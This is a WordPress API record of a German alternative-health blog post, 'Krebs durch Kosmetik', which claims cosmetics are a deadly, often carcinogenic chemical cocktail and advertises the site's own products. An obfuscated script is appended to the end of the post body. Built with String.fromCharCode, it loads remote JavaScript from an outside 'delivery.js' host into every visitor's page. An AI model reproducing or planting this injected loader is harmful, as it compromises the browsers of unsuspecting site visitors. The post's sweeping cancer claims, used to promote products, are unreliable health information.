{"id":688,"date":"2011-01-28T10:58:25","date_gmt":"2011-01-28T09:58:25","guid":{"rendered":"http:\/\/energiemedizin.de\/blog\/?p=688"},"modified":"2017-08-11T14:29:54","modified_gmt":"2017-08-11T14:29:54","slug":"krebs-durch-kosmetik","status":"publish","type":"post","link":"http:\/\/blog.energiemedizin.de\/?p=688","title":{"rendered":"Krebs durch Kosmetik"},"content":{"rendered":"<p>(Charu Bahri) &#8211; W\u00e4hrend das Interesse an einer biologisch-organischen Ern\u00e4hrung inzwischen sehr gro\u00df ist, fehlt dieses Bewusstsein bei Kosmetik- und Hygieneprodukten noch fast vollst\u00e4ndig. Hinzu kommt, dass die chemischen, oft krebserregenden Inhaltsstoffe nicht einmal auf der Verpackung deklariert sind.<\/p>\n<h3><span style=\"color: #000000;\">K\u00f6rperpflegemittel &#8211; Ein t\u00f6dlicher Chemikaliencocktail <\/span><\/h3>\n<p><span style=\"color: #000000;\"><br \/>\n<\/span><\/p>\n<p>Es darf keine gew\u00f6hnliche Seife sein. Wir reinigen uns mit einem Gesichts- und K\u00f6rperpeeling und tupfen unsere Haut trocken. Dann salben wir sie mit revitalisierenden Cremes. Als n\u00e4chstes kommen ein paar Spritzer Deodorant, um die K\u00f6rperger\u00fcche zu \u00fcberdecken (unsere nat\u00fcrlichen Schwei\u00dfger\u00fcche, die am Ende eines harten Arbeitstages unvermeidlich sind, muss man dazu sagen). Danach tragen wir vielleicht noch ein paar Tupfer Parf\u00fcm- oder Aftershave &#8211; Lotion auf. F\u00fcr etwa die H\u00e4lfte unserer erwachsenen und jugendlichen Bev\u00f6lkerung &#8211; ja, ich meine die Frauen &#8211; folgt nun eine komplizierte Schminkprozedur: Sonnenschutzcreme, Make-up, Lidschatten, Nagellack etc. Die Liste scheint endlos und kaum einer weiss, wie sehr er seiner Gesundheit damit schadet.<\/p>\n<p><a href=\"http:\/\/www.zentrum-der-gesundheit.de\/ia-koerperpflegemittel.html\" target=\"_blank\" rel=\"noopener\">Weiterlesen&#8230;<\/a><\/p>\n<p>Quelle: Zentrum der Gesundheit<\/p>\n<h4><span style=\"color: #000000;\">Wenn Sie mehr zu Kosmetikprodukten ohne <a href=\"http:\/\/www.energiemedizin.de\/newaysProdukte\/neways\/3000_inhaltsstoffe.mp4 \" target=\"_blank\" rel=\"noopener\">3000 bedenkliche Inhaltsstoffe <\/a>erfahren m\u00f6chten, nehmen Sie<a href=\"http:\/\/blog.energiemedizin.de\/?page_id=29\"> Kontakt<\/a> mit uns auf.<\/span><\/h4>\n<p><strong>Achim Steffan &amp; Team<\/strong><\/p>\n<h4><\/h4>\n<p><script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>(Charu Bahri) &#8211; W\u00e4hrend das Interesse an einer biologisch-organischen Ern\u00e4hrung inzwischen sehr gro\u00df ist, fehlt dieses Bewusstsein bei Kosmetik- und Hygieneprodukten noch fast vollst\u00e4ndig. Hinzu kommt, dass die chemischen, oft krebserregenden Inhaltsstoffe nicht einmal auf der Verpackung deklariert sind. K\u00f6rperpflegemittel &#8211; Ein t\u00f6dlicher Chemikaliencocktail Es darf keine gew\u00f6hnliche Seife sein. Wir reinigen uns mit einem [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,7],"tags":[64,67,98,99,102],"_links":{"self":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/posts\/688"}],"collection":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=688"}],"version-history":[{"count":2,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/posts\/688\/revisions"}],"predecessor-version":[{"id":6453,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/posts\/688\/revisions\/6453"}],"wp:attachment":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=688"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=688"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}